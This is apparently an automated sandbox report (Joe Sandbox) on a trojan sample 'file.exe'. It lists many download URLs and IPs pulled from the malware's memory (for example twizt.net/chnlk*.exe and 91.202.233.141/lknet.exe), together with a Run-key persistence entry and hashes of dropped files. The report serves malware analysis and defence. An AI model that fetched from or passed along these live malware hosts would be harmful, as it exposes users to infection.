                          http://twizt.net/chnlk6.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/lknet.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://77.91.77.92/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://twizt.net/chnlk20.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/file.exe, sysmablsvr.exe.0.drtrue
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/1Fsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/PLTRESA524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://schemas.xmlsoap.org/soap/envelope/sysmablsvr.exe.0.drfalse
                          • URL Reputation: safe
                          unknown
                          http://91.202.233.141/1sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://91.202.233.141/2sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://twizt.net/chnlk7.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/1JJC:sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk10.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.215.113.66/1.sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/lknet.exeCHNOSGDKAUNZGBQABMDEFRITESPLGRnginx.exehttpd.exehttp://twizt.net/chnlsysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/26sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/5sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://77.91.77.92/1sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/3sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/4sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://77.91.77.92/1/3sysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/3Psysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/http://77.91.77.92/http://91.202.233.141/123456%s%s%s:Zone.Identifier%userproffile.exe, sysmablsvr.exe.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/1/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk4.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://185.215.113.66/file.exe, sysmablsvr.exe.0.drtrue
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/PLTRESAA524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/4tsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk5.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://77.91.77.92/1/68lsysmablsvr.exe, 00000001.00000002.4234405265.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk16.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://77.91.77.92/51sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/sysmablsvr.exe.0.drfalse
                          • URL Reputation: safe
                          unknown
                          http://185.215.113.66/4#sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/3hsysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk17.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://twizt.net/chnlk15.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://twizt.net/chnlk2.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/PLTRESAz524024912.exe, 00000007.00000002.2490877099.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/5sysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/PLTRESAMozilla/5.0524024912.exe, 00000007.00000000.2434511449.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe, 00000007.00000002.2489367139.0000000000222000.00000002.00000001.01000000.00000008.sdmp, 524024912.exe.1.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/3sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/2sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/PLTRESAd524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234405265.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/1C:sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878878518.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000003.1878685410.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/26qsysmablsvr.exe, 00000001.00000002.4234405265.000000000067E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/1C:sysmablsvr.exe, 00000001.00000002.4234405265.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/1Ysysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk18.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/lkdrv.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk3.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://twizt.net/chnlk14.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/65Psysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://91.202.233.141/23sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk8.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://77.91.77.92/2/6sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, sysmablsvr.exe, 00000001.00000002.4234854329.000000000221B000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://77.91.77.92/2/5sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://185.215.113.66/5%sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://twizt.net/chnlk13.exesysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/6.sysmablsvr.exe, 00000001.00000002.4234405265.0000000000744000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://91.202.233.141/H524024912.exe, 00000007.00000002.2490877099.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
IP: 10.102.10.21
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1512821
Start date and time: 2024-09-17 23:08:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/17@0/87
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 63
                          • Number of non-executed functions: 160
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 20.72.235.82
                          • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, www.update.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe
Time | Type | Description
17:09:14 | API Interceptor | 2586973x Sleep call for process: sysmablsvr.exe modified
22:09:11 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysmablsvr.exe
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):7936
                                            Entropy (8bit):7.9773160117550175
                                            Encrypted:false
                                            SSDEEP:192:eCcU4lTpyjoqU4TWTeguLt/1tS1o6Tqu37b7WPkE7qHDHyo:eCcVLIowLt/1STqu37HI1I
                                            MD5:CDC59EC342E22103257F213FED156807
                                            SHA1:0B7F95AB9FA24A7CEA2E34B9AFF3845A8923F96F
                                            SHA-256:DDF959FF63893AC8EB8ED9F877448072FE7B5FAE741B3AF3D5DB5B06AC154678
                                            SHA-512:E215E2933636DF7B5EECD21DD64A90DE8E06D5BC41CE71673263EC36073AD926C3D3F6910B969ECCF8E02458B0D580248DF3C07E01D6BA9E6B1F7B3F14A34BB1
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):12544
                                            Entropy (8bit):7.983900388354255
                                            Encrypted:false
                                            SSDEEP:384:nIfNmhu6Fs1QP0fXwPZ3KAevU+9EPA354:IFmBDPxPczx9f3u
                                            MD5:99CDA5AFE638C2770B12440385DE45E6
                                            SHA1:0AB0AA07BCFB747CC4D45A57BCBBCDEB9B44BB40
                                            SHA-256:9150DD7B934D654B310DFF5550F2FB3210009D2264CEFF0228F9C5DB319577BF
                                            SHA-512:F6886DE4243D9A657E3007FF70BDD1CFF92CBC94919238A03C9239C4A4B98F08EC56F1A004AED065CDE50B519F473332653439EE10C9357A0977D893D92165ED
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8200
                                            Entropy (8bit):7.978897056764554
                                            Encrypted:false
                                            SSDEEP:192:kD4d5ObbY6sB1iNUlT+w5hzHv2ojIsITGKov+KjvZT:ZYmqNUlyw5hzHv2fTGKuTrZT
                                            MD5:B4824500B417A4BEF5A7F356A7E59228
                                            SHA1:5D2B41DDB0FB14AF16D6F5434477CCE841FCCB61
                                            SHA-256:5E611106EBE3444BAFC26DD6D3C9DA9EC52114D95121D72C37A00D76D729B281
                                            SHA-512:74A3BEF099FF33F00151AB07534F66CFD8408F156E308063CD1FE4C0D3CA9DD104619FC1E5E654D3E85D4897BF68F015144969CA17BFD04186724C1A9CCD4D0A
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
